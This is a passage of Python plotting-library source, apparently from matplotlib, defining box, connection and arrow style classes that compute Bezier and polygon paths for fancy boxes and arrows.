return cls._style_list
@classmethod
def pprint_styles(cls):
"""Return the available styles as pretty-printed string."""
table = [('Class', 'Name', 'Attrs'),
*[(cls.__name__,
# Add backquotes, as - and | have special meaning in reST.
f'``{name}``',
# [1:-1] drops the surrounding parentheses.
str(inspect.signature(cls))[1:-1] or 'None')
for name, cls in sorted(cls._style_list.items())]]
# Convert to rst table.
col_len = [max(len(cell) for cell in column) for column in zip(*table)]
table_formatstr = ' '.join('=' * cl for cl in col_len)
rst_table = '\n'.join([
'',
table_formatstr,
' '.join(cell.ljust(cl) for cell, cl in zip(table[0], col_len)),
table_formatstr,
*[' '.join(cell.ljust(cl) for cell, cl in zip(row, col_len))
for row in table[1:]],
table_formatstr,
'',
])
return textwrap.indent(rst_table, prefix=' ' * 2)
@classmethod
def register(cls, name, style):
"""Register a new style."""
if not issubclass(style, cls._Base):
raise ValueError("%s must be a subclass of %s" % (style,
cls._Base))
cls._style_list[name] = style
def _register_style(style_list, cls=None, *, name=None):
"""Class decorator that stashes a class in a (style) dictionary."""
if cls is None:
return functools.partial(_register_style, style_list, name=name)
style_list[name or cls.__name__.lower()] = cls
return cls
class BoxStyle(_Style):
"""
`BoxStyle` is a container class which defines several
boxstyle classes, which are used for `FancyBboxPatch`.
A style object can be created as::
BoxStyle.Round(pad=0.2)
or::
BoxStyle("Round", pad=0.2)
or::
BoxStyle("Round, pad=0.2")
The following boxstyle classes are defined.
%(AvailableBoxstyles)s
    An instance of any boxstyle class is a callable object,
whose call signature is::
__call__(self, x0, y0, width, height, mutation_size, aspect_ratio=1.)
and returns a `.Path` instance. *x0*, *y0*, *width* and
*height* specify the location and size of the box to be
    drawn. *mutation_size* determines the overall size of the
    mutation (by which I mean the transformation of the rectangle to
    the fancy box). *aspect_ratio* determines the aspect ratio of
    the mutation.
"""
_style_list = {}
class _Base:
"""
Abstract base class for styling of `.FancyBboxPatch`.
This class is not an artist itself. The `__call__` method returns the
`~matplotlib.path.Path` for outlining the fancy box. The actual drawing
is handled in `.FancyBboxPatch`.
Subclasses may only use parameters with default values in their
``__init__`` method because they must be able to be initialized
without arguments.
Subclasses must implement the `transmute` method. It receives the
enclosing rectangle *x0, y0, width, height* as well as the
*mutation_size*, which scales the outline properties such as padding.
It returns the outline of the fancy box as `.path.Path`.
"""
def transmute(self, x0, y0, width, height, mutation_size):
"""Return the `~.path.Path` outlining the given rectangle."""
raise NotImplementedError('Derived must override')
def __call__(self, x0, y0, width, height, mutation_size,
aspect_ratio=1.):
"""
Given the location and size of the box, return the path of
the box around it.
Parameters
----------
x0, y0, width, height : float
Location and size of the box.
mutation_size : float
A reference scale for the mutation.
aspect_ratio : float, default: 1
Aspect-ratio for the mutation.
Returns
-------
`~matplotlib.path.Path`
"""
# The __call__ method is a thin wrapper around the transmute method
# and takes care of the aspect.
if aspect_ratio is not None:
# Squeeze the given height by the aspect_ratio
y0, height = y0 / aspect_ratio, height / aspect_ratio
# call transmute method with squeezed height.
path = self.transmute(x0, y0, width, height, mutation_size)
vertices, codes = path.vertices, path.codes
# Restore the height
vertices[:, 1] = vertices[:, 1] * aspect_ratio
return Path(vertices, codes)
else:
return self.transmute(x0, y0, width, height, mutation_size)
@_register_style(_style_list)
class Square(_Base):
"""
A square box.
Parameters
----------
pad : float, default: 0.3
The amount of padding around the original box.
"""
def __init__(self, pad=0.3):
self.pad = pad
super().__init__()
def transmute(self, x0, y0, width, height, mutation_size):
pad = mutation_size * self.pad
# width and height with padding added.
width, height = width + 2 * pad, height + 2 * pad
# boundary of the padded box
x0, y0 = x0 - pad, y0 - pad
x1, y1 = x0 + width, y0 + height
return Path([(x0, y0), (x1, y0), (x1, y1), (x0, y1), (x0, y0)],
closed=True)
@_register_style(_style_list)
class Circle(_Base):
"""
A circular box.
Parameters
----------
pad : float, default: 0.3
The amount of padding around the original box.
"""
def __init__(self, pad=0.3):
self.pad = pad
super().__init__()
def transmute(self, x0, y0, width, height, mutation_size):
pad = mutation_size * self.pad
width, height = width + 2 * pad, height + 2 * pad
# boundary of the padded box
x0, y0 = x0 - pad, y0 - pad
return Path.circle((x0 + width / 2, y0 + height / 2),
max(width, height) / 2)
@_register_style(_style_list)
class LArrow(_Base):
"""
A box in the shape of a left-pointing arrow.
Parameters
----------
pad : float, default: 0.3
The amount of padding around the original box.
"""
def __init__(self, pad=0.3):
self.pad = pad
super().__init__()
def transmute(self, x0, y0, width, height, mutation_size):
# padding
pad = mutation_size * self.pad
# width and height with padding added.
width, height = width + 2 * pad, height + 2 * pad
# boundary of the padded box
x0, y0 = x0 - pad, y0 - pad,
x1, y1 = x0 + width, y0 + height
dx = (y1 - y0) / 2
dxx = dx / 2
x0 = x0 + pad / 1.4 # adjust by ~sqrt(2)
return Path([(x0 + dxx, y0), (x1, y0), (x1, y1), (x0 + dxx, y1),
(x0 + dxx, y1 + dxx), (x0 - dx, y0 + dx),
(x0 + dxx, y0 - dxx), # arrow
(x0 + dxx, y0), (x0 + dxx, y0)],
closed=True)
@_register_style(_style_list)
class RArrow(LArrow):
"""
A box in the shape of a right-pointing arrow.
Parameters
----------
pad : float, default: 0.3
The amount of padding around the original box.
"""
def __init__(self, pad=0.3):
super().__init__(pad)
def transmute(self, x0, y0, width, height, mutation_size):
p = BoxStyle.LArrow.transmute(self, x0, y0,
width, height, mutation_size)
p.vertices[:, 0] = 2 * x0 + width - p.vertices[:, 0]
return p
@_register_style(_style_list)
class DArrow(_Base):
"""
A box in the shape of a two-way arrow.
Parameters
----------
pad : float, default: 0.3
The amount of padding around the original box.
"""
# This source is copied from LArrow,
# modified to add a right arrow to the bbox.
def __init__(self, pad=0.3):
self.pad = pad
super().__init__()
def transmute(self, x0, y0, width, height, mutation_size):
# padding
pad = mutation_size * self.pad
# width and height with padding added.
# The width is padded by the arrows, so we don't need to pad it.
height = height + 2 * pad
# boundary of the padded box
x0, y0 = x0 - pad, y0 - pad
x1, y1 = x0 + width, y0 + height
dx = (y1 - y0) / 2
dxx = dx / 2
x0 = x0 + pad / 1.4 # adjust by ~sqrt(2)
return Path([(x0 + dxx, y0), (x1, y0), # bot-segment
(x1, y0 - dxx), (x1 + dx + dxx, y0 + dx),
(x1, y1 + dxx), # right-arrow
(x1, y1), (x0 + dxx, y1), # top-segment
(x0 + dxx, y1 + dxx), (x0 - dx, y0 + dx),
(x0 + dxx, y0 - dxx), # left-arrow
(x0 + dxx, y0), (x0 + dxx, y0)], # close-poly
closed=True)
@_register_style(_style_list)
class Round(_Base):
"""
A box with round corners.
Parameters
----------
pad : float, default: 0.3
The amount of padding around the original box.
rounding_size : float, default: *pad*
Radius of the corners.
"""
def __init__(self, pad=0.3, rounding_size=None):
self.pad = pad
self.rounding_size = rounding_size
super().__init__()
def transmute(self, x0, y0, width, height, mutation_size):
# padding
pad = mutation_size * self.pad
# size of the rounding corner
if self.rounding_size:
dr = mutation_size * self.rounding_size
else:
dr = pad
width, height = width + 2 * pad, height + 2 * pad
x0, y0 = x0 - pad, y0 - pad,
x1, y1 = x0 + width, y0 + height
# Round corners are implemented as quadratic Bezier, e.g.,
# [(x0, y0-dr), (x0, y0), (x0+dr, y0)] for lower left corner.
cp = [(x0 + dr, y0),
(x1 - dr, y0),
(x1, y0), (x1, y0 + dr),
(x1, y1 - dr),
(x1, y1), (x1 - dr, y1),
(x0 + dr, y1),
(x0, y1), (x0, y1 - dr),
(x0, y0 + dr),
(x0, y0), (x0 + dr, y0),
(x0 + dr, y0)]
com = [Path.MOVETO,
Path.LINETO,
Path.CURVE3, Path.CURVE3,
Path.LINETO,
Path.CURVE3, Path.CURVE3,
Path.LINETO,
Path.CURVE3, Path.CURVE3,
Path.LINETO,
Path.CURVE3, Path.CURVE3,
Path.CLOSEPOLY]
path = Path(cp, com)
return path
@_register_style(_style_list)
class Round4(_Base):
"""
A box with rounded edges.
Parameters
----------
pad : float, default: 0.3
The amount of padding around the original box.
rounding_size : float, default: *pad*/2
Rounding of edges.
"""
def __init__(self, pad=0.3, rounding_size=None):
self.pad = pad
self.rounding_size = rounding_size
super().__init__()
def transmute(self, x0, y0, width, height, mutation_size):
# padding
pad = mutation_size * self.pad
# Rounding size; defaults to half of the padding.
if self.rounding_size:
dr = mutation_size * self.rounding_size
else:
dr = pad / 2.
width = width + 2 * pad - 2 * dr
height = height + 2 * pad - 2 * dr
x0, y0 = x0 - pad + dr, y0 - pad + dr,
x1, y1 = x0 + width, y0 + height
cp = [(x0, y0),
(x0 + dr, y0 - dr), (x1 - dr, y0 - dr), (x1, y0),
(x1 + dr, y0 + dr), (x1 + dr, y1 - dr), (x1, y1),
(x1 - dr, y1 + dr), (x0 + dr, y1 + dr), (x0, y1),
(x0 - dr, y1 - dr), (x0 - dr, y0 + dr), (x0, y0),
(x0, y0)]
com = [Path.MOVETO,
Path.CURVE4, Path.CURVE4, Path.CURVE4,
Path.CURVE4, Path.CURVE4, Path.CURVE4,
Path.CURVE4, Path.CURVE4, Path.CURVE4,
Path.CURVE4, Path.CURVE4, Path.CURVE4,
Path.CLOSEPOLY]
path = Path(cp, com)
return path
@_register_style(_style_list)
class Sawtooth(_Base):
"""
A box with a sawtooth outline.
Parameters
----------
pad : float, default: 0.3
The amount of padding around the original box.
tooth_size : float, default: *pad*/2
Size of the sawtooth.
"""
def __init__(self, pad=0.3, tooth_size=None):
self.pad = pad
self.tooth_size = tooth_size
super().__init__()
def _get_sawtooth_vertices(self, x0, y0, width, height, mutation_size):
# padding
pad = mutation_size * self.pad
# size of sawtooth
if self.tooth_size is None:
tooth_size = self.pad * .5 * mutation_size
else:
tooth_size = self.tooth_size * mutation_size
tooth_size2 = tooth_size / 2
width = width + 2 * pad - tooth_size
height = height + 2 * pad - tooth_size
# the sizes of the vertical and horizontal sawtooth are
# separately adjusted to fit the given box size.
dsx_n = int(round((width - tooth_size) / (tooth_size * 2))) * 2
dsx = (width - tooth_size) / dsx_n
dsy_n = int(round((height - tooth_size) / (tooth_size * 2))) * 2
dsy = (height - tooth_size) / dsy_n
x0, y0 = x0 - pad + tooth_size2, y0 - pad + tooth_size2
x1, y1 = x0 + width, y0 + height
bottom_saw_x = [
x0,
*(x0 + tooth_size2 + dsx * .5 * np.arange(dsx_n * 2)),
x1 - tooth_size2,
]
bottom_saw_y = [
y0,
*([y0 - tooth_size2, y0, y0 + tooth_size2, y0] * dsx_n),
y0 - tooth_size2,
]
right_saw_x = [
x1,
                *([x1 + tooth_size2, x1, x1 - tooth_size2, x1] * dsy_n),
x1 + tooth_size2,
]
right_saw_y = [
y0,
*(y0 + tooth_size2 + dsy * .5 * np.arange(dsy_n * 2)),
y1 - tooth_size2,
]
top_saw_x = [
x1,
*(x1 - tooth_size2 - dsx * .5 * np.arange(dsx_n * 2)),
x0 + tooth_size2,
]
top_saw_y = [
y1,
*([y1 + tooth_size2, y1, y1 - tooth_size2, y1] * dsx_n),
y1 + tooth_size2,
]
left_saw_x = [
x0,
*([x0 - tooth_size2, x0, x0 + tooth_size2, x0] * dsy_n),
x0 - tooth_size2,
]
left_saw_y = [
y1,
*(y1 - tooth_size2 - dsy * .5 * np.arange(dsy_n * 2)),
y0 + tooth_size2,
]
saw_vertices = [*zip(bottom_saw_x, bottom_saw_y),
*zip(right_saw_x, right_saw_y),
*zip(top_saw_x, top_saw_y),
*zip(left_saw_x, left_saw_y),
(bottom_saw_x[0], bottom_saw_y[0])]
return saw_vertices
def transmute(self, x0, y0, width, height, mutation_size):
saw_vertices = self._get_sawtooth_vertices(x0, y0, width,
height, mutation_size)
path = Path(saw_vertices, closed=True)
return path
@_register_style(_style_list)
class Roundtooth(Sawtooth):
"""
A box with a rounded sawtooth outline.
Parameters
----------
pad : float, default: 0.3
The amount of padding around the original box.
tooth_size : float, default: *pad*/2
Size of the sawtooth.
"""
def __init__(self, pad=0.3, tooth_size=None):
super().__init__(pad, tooth_size)
def transmute(self, x0, y0, width, height, mutation_size):
saw_vertices = self._get_sawtooth_vertices(x0, y0,
width, height,
mutation_size)
# Add a trailing vertex to allow us to close the polygon correctly
saw_vertices = np.concatenate([saw_vertices, [saw_vertices[0]]])
codes = ([Path.MOVETO] +
[Path.CURVE3, Path.CURVE3] * ((len(saw_vertices)-1)//2) +
[Path.CLOSEPOLY])
return Path(saw_vertices, codes)
class ConnectionStyle(_Style):
"""
`ConnectionStyle` is a container class which defines
    several connectionstyle classes, which are used to create a path
    between two points. These are mainly used with `FancyArrowPatch`.
    A connectionstyle object can be created as::
ConnectionStyle.Arc3(rad=0.2)
or::
ConnectionStyle("Arc3", rad=0.2)
or::
ConnectionStyle("Arc3, rad=0.2")
The following classes are defined
%(AvailableConnectorstyles)s
    An instance of any connection style class is a callable object,
whose call signature is::
__call__(self, posA, posB,
patchA=None, patchB=None,
shrinkA=2., shrinkB=2.)
and it returns a `.Path` instance. *posA* and *posB* are
tuples of (x, y) coordinates of the two points to be
    connected. If *patchA* (or *patchB*) is given, the returned path is
    clipped so that it starts (or ends) at the boundary of the
patch. The path is further shrunk by *shrinkA* (or *shrinkB*)
which is given in points.
"""
_style_list = {}
class _Base:
"""
A base class for connectionstyle classes. The subclass needs
to implement a *connect* method whose call signature is::
connect(posA, posB)
where posA and posB are tuples of x, y coordinates to be
connected. The method needs to return a path connecting two
points. This base class defines a __call__ method, and a few
helper methods.
"""
class SimpleEvent:
def __init__(self, xy):
self.x, self.y = xy
def _clip(self, path, patchA, patchB):
"""
            Clip the path to the boundaries of patchA and patchB.
            The starting point of the path needs to be inside patchA and
            the end point inside patchB. The *contains* method of each
            patch object is used to test whether the point is inside the
            patch.
"""
if patchA:
def insideA(xy_display):
xy_event = ConnectionStyle._Base.SimpleEvent(xy_display)
return patchA.contains(xy_event)[0]
try:
left, right = split_path_inout(path, insideA)
except ValueError:
right = path
path = right
if patchB:
def insideB(xy_display):
xy_event = ConnectionStyle._Base.SimpleEvent(xy_display)
return patchB.contains(xy_event)[0]
try:
left, right = split_path_inout(path, insideB)
except ValueError:
left = path
path = left
return path
def _shrink(self, path, shrinkA, shrinkB):
"""
Shrink the path by fixed size (in points) with shrinkA and shrinkB.
"""
if shrinkA:
insideA = inside_circle(*path.vertices[0], shrinkA)
try:
left, path = split_path_inout(path, insideA)
except ValueError:
pass
if shrinkB:
insideB = inside_circle(*path.vertices[-1], shrinkB)
try:
path, right = split_path_inout(path, insideB)
except ValueError:
pass
return path
def __call__(self, posA, posB,
shrinkA=2., shrinkB=2., patchA=None, patchB=None):
"""
Call the *connect* method to create a path between *posA* and
*posB*; then clip and shrink the path.
"""
path = self.connect(posA, posB)
clipped_path = self._clip(path, patchA, patchB)
shrunk_path = self._shrink(clipped_path, shrinkA, shrinkB)
return shrunk_path
@_register_style(_style_list)
class Arc3(_Base):
"""
Creates a simple quadratic Bezier curve between two
points. The curve is created so that the middle control point
        (C1) is located at the same distance from the start (C0) and
        end (C2) points, and the distance of C1 from the line
        connecting C0 and C2 is *rad* times the distance between C0 and C2.
"""
def __init__(self, rad=0.):
"""
*rad*
curvature of the curve.
"""
self.rad = rad
def connect(self, posA, posB):
x1, y1 = posA
x2, y2 = posB
x12, y12 = (x1 + x2) / 2., (y1 + y2) / 2.
dx, dy = x2 - x1, y2 - y1
f = self.rad
cx, cy = x12 + f * dy, y12 - f * dx
vertices = [(x1, y1),
(cx, cy),
(x2, y2)]
codes = [Path.MOVETO,
Path.CURVE3,
Path.CURVE3]
return Path(vertices, codes)
@_register_style(_style_list)
class Angle3(_Base):
"""
Creates a simple quadratic Bezier curve between two
        points. The middle control point is placed at the
        intersection of two lines which pass through the start and
        end points and have slopes of angleA and angleB, respectively.
"""
def __init__(self, angleA=90, angleB=0):
"""
*angleA*
starting angle of the path
*angleB*
ending angle of the path
"""
self.angleA = angleA
self.angleB = angleB
def connect(self, posA, posB):
x1, y1 = posA
x2, y2 = posB
cosA = math.cos(math.radians(self.angleA))
sinA = math.sin(math.radians(self.angleA))
cosB = math.cos(math.radians(self.angleB))
sinB = math.sin(math.radians(self.angleB))
cx, cy = get_intersection(x1, y1, cosA, sinA,
x2, y2, cosB, sinB)
vertices = [(x1, y1), (cx, cy), (x2, y2)]
codes = [Path.MOVETO, Path.CURVE3, Path.CURVE3]
return Path(vertices, codes)
@_register_style(_style_list)
class Angle(_Base):
"""
Creates a piecewise continuous quadratic Bezier path between
        two points. The path has one passing-through point, placed at
        the intersection of two lines which pass through the start
        and end points and have slopes of angleA and angleB, respectively.
The connecting edges are rounded with *rad*.
"""
def __init__(self, angleA=90, angleB=0, rad=0.):
"""
*angleA*
starting angle of the path
*angleB*
ending angle of the path
*rad*
rounding radius of the edge
"""
self.angleA = angleA
self.angleB = angleB
self.rad = rad
def connect(self, posA, posB):
x1, y1 = posA
x2, y2 = posB
cosA = math.cos(math.radians(self.angleA))
sinA = math.sin(math.radians(self.angleA))
cosB = math.cos(math.radians(self.angleB))
sinB = math.sin(math.radians(self.angleB))
cx, cy = get_intersection(x1, y1, cosA, sinA,
x2, y2, cosB, sinB)
vertices = [(x1, y1)]
codes = [Path.MOVETO]
if self.rad == 0.:
vertices.append((cx, cy))
codes.append(Path.LINETO)
else:
dx1, dy1 = x1 - cx, y1 - cy
d1 = np.hypot(dx1, dy1)
f1 = self.rad / d1
dx2, dy2 = x2 - cx, y2 - cy
d2 = np.hypot(dx2, dy2)
f2 = self.rad / d2
vertices.extend([(cx + dx1 * f1, cy + dy1 * f1),
(cx, cy),
(cx + dx2 * f2, cy + dy2 * f2)])
codes.extend([Path.LINETO, Path.CURVE3, Path.CURVE3])
vertices.append((x2, y2))
codes.append(Path.LINETO)
return Path(vertices, codes)
@_register_style(_style_list)
class Arc(_Base):
"""
Creates a piecewise continuous quadratic Bezier path between
        two points. The path can have two passing-through points: a
        point placed at distance armA and angle angleA from point A,
        and another point placed analogously with respect to point B.
        The edges are rounded with *rad*.
"""
def __init__(self, angleA=0, angleB=0, armA=None, armB=None, rad=0.):
"""
*angleA* :
starting angle of the path
*angleB* :
ending angle of the path
*armA* :
length of the starting arm
*armB* :
length of the ending arm
*rad* :
rounding radius of the edges
"""
self.angleA = angleA
self.angleB = angleB
self.armA = armA
self.armB = armB
self.rad = rad
def connect(self, posA, posB):
x1, y1 = posA
x2, y2 = posB
vertices = [(x1, y1)]
rounded = []
codes = [Path.MOVETO]
if self.armA:
cosA = math.cos(math.radians(self.angleA))
sinA = math.sin(math.radians(self.angleA))
                # x_armA, y_armA
d = self.armA - self.rad
rounded.append((x1 + d * cosA, y1 + d * sinA))
d = self.armA
rounded.append((x1 + d * cosA, y1 + d * sinA))
if self.armB:
cosB = math.cos(math.radians(self.angleB))
sinB = math.sin(math.radians(self.angleB))
x_armB, y_armB = x2 + self.armB * cosB, y2 + self.armB * sinB
if rounded:
xp, yp = rounded[-1]
dx, dy = x_armB - xp, y_armB - yp
dd = (dx * dx + dy * dy) ** .5
rounded.append((xp + self.rad * dx / dd,
yp + self.rad * dy / dd))
vertices.extend(rounded)
codes.extend([Path.LINETO,
Path.CURVE3,
Path.CURVE3])
else:
xp, yp = vertices[-1]
dx, dy = x_armB - xp, y_armB - yp
dd = (dx * dx + dy * dy) ** .5
d = dd - self.rad
rounded = [(xp + d * dx / dd, yp + d * dy / dd),
(x_armB, y_armB)]
if rounded:
xp, yp = rounded[-1]
dx, dy = x2 - xp, y2 - yp
dd = (dx * dx + dy * dy) ** .5
rounded.append((xp + self.rad * dx / dd,
yp + self.rad * dy / dd))
vertices.extend(rounded)
codes.extend([Path.LINETO,
Path.CURVE3,
Path.CURVE3])
vertices.append((x2, y2))
codes.append(Path.LINETO)
return Path(vertices, codes)
@_register_style(_style_list)
class Bar(_Base):
"""
        A connecting line between A and B, drawn at *angle*, with arms
        *armA* and *armB*. One of the arms is extended so that the two
        arms meet at a right angle. The length of armA is determined by
        (*armA* + *fraction* x AB distance); likewise for armB.
"""
def __init__(self, armA=0., armB=0., fraction=0.3, angle=None):
"""
Parameters
----------
armA : float
minimum length of armA
armB : float
minimum length of armB
fraction : float
a fraction of the distance between two points that
will be added to armA and armB.
angle : float or None
angle of the connecting line (if None, parallel
to A and B)
"""
self.armA = armA
self.armB = armB
self.fraction = fraction
self.angle = angle
def connect(self, posA, posB):
x1, y1 = posA
x20, y20 = x2, y2 = posB
theta1 = math.atan2(y2 - y1, x2 - x1)
dx, dy = x2 - x1, y2 - y1
dd = (dx * dx + dy * dy) ** .5
ddx, ddy = dx / dd, dy / dd
armA, armB = self.armA, self.armB
if self.angle is not None:
theta0 = np.deg2rad(self.angle)
dtheta = theta1 - theta0
dl = dd * math.sin(dtheta)
dL = dd * math.cos(dtheta)
x2, y2 = x1 + dL * math.cos(theta0), y1 + dL * math.sin(theta0)
armB = armB - dl
# update
dx, dy = x2 - x1, y2 - y1
dd2 = (dx * dx + dy * dy) ** .5
ddx, ddy = dx / dd2, dy / dd2
arm = max(armA, armB)
f = self.fraction * dd + arm
cx1, cy1 = x1 + f * ddy, y1 - f * ddx
cx2, cy2 = x2 + f * ddy, y2 - f * ddx
vertices = [(x1, y1),
(cx1, cy1),
(cx2, cy2),
(x20, y20)]
codes = [Path.MOVETO,
Path.LINETO,
Path.LINETO,
Path.LINETO]
return Path(vertices, codes)
def _point_along_a_line(x0, y0, x1, y1, d):
"""
Return the point on the line connecting (*x0*, *y0*) -- (*x1*, *y1*) whose
distance from (*x0*, *y0*) is *d*.
"""
dx, dy = x0 - x1, y0 - y1
ff = d / (dx * dx + dy * dy) ** .5
x2, y2 = x0 - ff * dx, y0 - ff * dy
return x2, y2
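# Hedged sanity check for _point_along_a_line: walking a distance of 3 from
# (0, 0) toward (10, 0) lands on (3, 0):
#
#     >>> _point_along_a_line(0, 0, 10, 0, 3)
#     (3.0, 0.0)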
class ArrowStyle(_Style):
"""
`ArrowStyle` is a container class which defines several
    arrowstyle classes, which are used to create an arrow path along a
    given path. These are mainly used with `FancyArrowPatch`.
    An arrowstyle object can be created as::
ArrowStyle.Fancy(head_length=.4, head_width=.4, tail_width=.4)
or::
ArrowStyle("Fancy", head_length=.4, head_width=.4, tail_width=.4)
or::
ArrowStyle("Fancy, head_length=.4, head_width=.4, tail_width=.4")
The following classes are defined
%(AvailableArrowstyles)s
An instance of any arrow style class is a callable object,
whose call signature is::
__call__(self, path, mutation_size, linewidth, aspect_ratio=1.)
and it returns a tuple of a `.Path` instance and a boolean
value. *path* is a `.Path` instance along which the arrow
will be drawn. *mutation_size* and *aspect_ratio* have the same
meaning as in `BoxStyle`. *linewidth* is a line width to be
stroked. This is meant to be used to correct the location of the
head so that it does not overshoot the destination point, but not all
classes support it.
"""
_style_list = {}
class _Base:
"""
Arrow Transmuter Base class
ArrowTransmuterBase and its derivatives are used to make a fancy
arrow around a given path. The __call__ method returns a path
(which will be used to create a PathPatch instance) and a boolean
        value indicating whether the path is open and therefore not fillable. This
class is not an artist and actual drawing of the fancy arrow is
done by the FancyArrowPatch class.
"""
# The derived classes are required to be able to be initialized
# w/o arguments, i.e., all its argument (except self) must have
# the default values.
@staticmethod
def ensure_quadratic_bezier(path):
"""
            Some ArrowStyle classes only work with a simple quadratic Bezier
            curve (created with ConnectionStyle.Arc3 or ConnectionStyle.Angle3).
            This static method checks whether the provided path is a simple
            quadratic Bezier curve and returns its control points if it is.
"""
segments = list(path.iter_segments())
if (len(segments) != 2 or segments[0][1] != Path.MOVETO or
segments[1][1] != Path.CURVE3):
raise ValueError(
"'path' is not a valid quadratic Bezier curve")
return [*segments[0][0], *segments[1][0]]
def transmute(self, path, mutation_size, linewidth):
"""
The transmute method is the very core of the ArrowStyle class and
must be overridden in the subclasses. It receives the path object
along which the arrow will be drawn, and the mutation_size, with
which the arrow head etc. will be scaled. The linewidth may be
used to adjust the path so that it does not pass beyond the given
points. It returns a tuple of a Path instance and a boolean. The
            boolean value indicates whether the path can be filled or not. The
            return value can also be a list of paths and a list of booleans of
            the same length.
"""
raise NotImplementedError('Derived must override')
def __call__(self, path, mutation_size, linewidth,
aspect_ratio=1.):
"""
The __call__ method is a thin wrapper around the transmute method
and takes care of the aspect ratio.
"""
if aspect_ratio is not None:
# Squeeze the given height by the aspect_ratio
vertices = path.vertices / [1, aspect_ratio]
path_shrunk = Path(vertices, path.codes)
# call transmute method with squeezed height.
                path_mutated, fillable = self.transmute(path_shrunk,
                                                        mutation_size,
                                                        linewidth)
if np.iterable(fillable):
path_list = []
                    for p in path_mutated:
# Restore the height
path_list.append(
Path(p.vertices * [1, aspect_ratio], p.codes))
return path_list, fillable
else:
return path_mutated, fillable
else:
return self.transmute(path, mutation_size, linewidth)
class _Curve(_Base):
"""
A simple arrow which will work with any path instance. The
        returned path is simply a concatenation of the original path and at
        most two paths representing the arrow heads at the begin point and
        at the end point. The arrow heads can be either open or closed.
"""
def __init__(self, beginarrow=None, endarrow=None,
fillbegin=False, fillend=False,
head_length=.2, head_width=.1):
"""
The arrows are drawn if *beginarrow* and/or *endarrow* are
            true. *head_length* and *head_width* determine the size
of the arrow relative to the *mutation scale*. The
arrowhead at the begin (or end) is closed if fillbegin (or
fillend) is True.
"""
self.beginarrow, self.endarrow = beginarrow, endarrow
self.head_length, self.head_width = head_length, head_width
self.fillbegin, self.fillend = fillbegin, fillend
super().__init__()
def _get_arrow_wedge(self, x0, y0, x1, y1,
head_dist, cos_t, sin_t, linewidth):
"""
Return the paths for arrow heads. Since arrow lines are
            drawn with capstyle=projecting, the arrow goes beyond the
            desired point. This method also returns the amount by which the
            path should be shrunken so that it does not overshoot.
"""
# arrow from x0, y0 to x1, y1
dx, dy = x0 - x1, y0 - y1
cp_distance = np.hypot(dx, dy)
            # pad_projected : amount of pad to account for the
# overshooting of the projection of the wedge
pad_projected = (.5 * linewidth / sin_t)
# Account for division by zero
if cp_distance == 0:
cp_distance = 1
# apply pad for projected edge
ddx = pad_projected * dx / cp_distance
ddy = pad_projected * dy / cp_distance
# offset for arrow wedge
dx = dx / cp_distance * head_dist
dy = dy / cp_distance * head_dist
dx1, dy1 = cos_t * dx + sin_t * dy, -sin_t * dx + cos_t * dy
dx2, dy2 = cos_t * dx - sin_t * dy, sin_t * dx + cos_t * dy
vertices_arrow = [(x1 + ddx + dx1, y1 + ddy + dy1),
(x1 + ddx, y1 + ddy),
(x1 + ddx + dx2, y1 + ddy + dy2)]
codes_arrow = [Path.MOVETO,
Path.LINETO,
Path.LINETO]
return vertices_arrow, codes_arrow, ddx, ddy
def transmute(self, path, mutation_size, linewidth):
head_length = self.head_length * mutation_size
head_width = self.head_width * mutation_size
head_dist = np.hypot(head_length, head_width)
cos_t, sin_t = head_length / head_dist, head_width / head_dist
# begin arrow
x0, y0 = path.vertices[0]
x1, y1 = path.vertices[1]
# If there is no room for an arrow and a line, then skip the arrow
has_begin_arrow = self.beginarrow and (x0, y0) != (x1, y1)
verticesA, codesA, ddxA, ddyA = (
self._get_arrow_wedge(x1, y1, x0, y0,
head_dist, cos_t, sin_t, linewidth)
if has_begin_arrow
else ([], [], 0, 0)
)
# end arrow
x2, y2 = path.vertices[-2]
x3, y3 = path.vertices[-1]
# If there is no room for an arrow and a line, then skip the arrow
has_end_arrow = self.endarrow and (x2, y2) != (x3, y3)
verticesB, codesB, ddxB, ddyB = (
self._get_arrow_wedge(x2, y2, x3, y3,
head_dist, cos_t, sin_t, linewidth)
if has_end_arrow
else ([], [], 0, 0)
)
# This simple code will not work if ddx, ddy is greater than the
# separation between vertices.
_path = [Path(np.concatenate([[(x0 + ddxA, y0 + ddyA)],
path.vertices[1:-1],
[(x3 + ddxB, y3 + ddyB)]]),
path.codes)]
_fillable = [False]
if has_begin_arrow:
if self.fillbegin:
p = np.concatenate([verticesA, [verticesA[0],
verticesA[0]], ])
c = np.concatenate([codesA, [Path.LINETO, Path.CLOSEPOLY]])
_path.append(Path(p, c))
_fillable.append(True)
else:
_path.append(Path(verticesA, codesA))
_fillable.append(False)
if has_end_arrow:
if self.fillend:
_fillable.append(True)
p = np.concatenate([verticesB, [verticesB[0],
verticesB[0]], ])
c = np.concatenate([codesB, [Path.LINETO, Path.CLOSEPOLY]])
_path.append(Path(p, c))
else:
_fillable.append(False)
_path.append(Path(verticesB, codesB))
return _path, _fillable
@_register_style(_style_list, name="-")
class Curve(_Curve):
"""A simple curve without any arrow head."""
def __init__(self):
super().__init__(beginarrow=False, endarrow=False)
@_register_style(_style_list, name="<-")
class CurveA(_Curve):
"""An arrow with a head at its begin point."""
def __init__(self, head_length=.4, head_width=.2):
"""
Parameters
----------
head_length : float, default: 0.4
Length of the arrow head.
head_width : float, default: 0.2
Width of the arrow head.
"""
super().__init__(beginarrow=True, endarrow=False,
head_length=head_length, head_width=head_width)
@_register_style(_style_list, name="->")
class CurveB(_Curve):
"""An arrow with a head at its end point."""
def __init__(self, head_length=.4, head_width=.2):
"""
Parameters
----------
head_length : float, default: 0.4
Length of the arrow head.
head_width : float, default: 0.2
Width of the arrow head.
"""
super().__init__(beginarrow=False, endarrow=True,
head_length=head_length, head_width=head_width)
@_register_style(_style_list, name="<->")
class CurveAB(_Curve):
"""An arrow with heads both at the begin and the end point."""
def __init__(self, head_length=.4, head_width=.2):
"""
Parameters
----------
head_length : float, default: 0.4
Length of the arrow head.
head_width : float, default: 0.2
Width of the arrow head.
"""
super().__init__(beginarrow=True, endarrow=True,
head_length=head_length, head_width=head_width)
@_register_style(_style_list, name="<|-")
class CurveFilledA(_Curve):
"""An arrow with filled triangle head at the begin."""
def __init__(self, head_length=.4, head_width=.2):
"""
Parameters
----------
head_length : float, default: 0.4
Length of the arrow head.
head_width : float, default: 0.2
Width of the arrow head.
"""
super().__init__(beginarrow=True, endarrow=False,
fillbegin=True, fillend=False,
head_length=head_length, head_width=head_width)
@_register_style(_style_list, name="-|>")
class CurveFilledB(_Curve):
"""An arrow with filled triangle head at the end."""
